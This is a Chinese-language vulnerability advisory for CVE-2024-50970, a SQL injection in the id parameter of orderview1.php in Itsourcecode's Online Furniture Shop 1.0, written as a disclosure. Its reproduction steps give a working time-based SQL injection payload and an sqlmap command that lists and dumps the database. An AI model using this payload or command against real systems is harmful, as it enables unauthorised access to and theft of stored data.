CVE-2024-50970
描述
Itsourcecode 在线家具购物项目 1.0 中的 orderview1.php 存在 SQL 注入漏洞,允许远程攻击者通过 id 参数执行任意 SQL 命令。
漏洞类型
SQL 注入
产品供应商
Itsourcecode
受影响产品代码库:
https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0
受影响组件:
Itsourcecode 在线家具购物 v1.0 的 orderview1.php 页面中的 id 参数存在 SQL 注入漏洞
攻击向量:
- 在本地搭建应用程序,注册一个账户,并使用新注册的账户登录。
- 在浏览器中导航到以下 URL:
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
- 注入 SQL 载荷:
修改 URL 中的 id 参数,加入基于时间的 SQL 注入载荷。
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
- 观察应用程序响应:
如果注入成功,页面加载时间应明显变长(10 秒),从而确认 id 参数存在 SQL 注入漏洞。
- 现在使用 SQLMap 工具进行进一步利用和数据库转储,命令如下:
python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
参考:
- https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
- https://owasp.org/www-community/attacks/SQL_Injection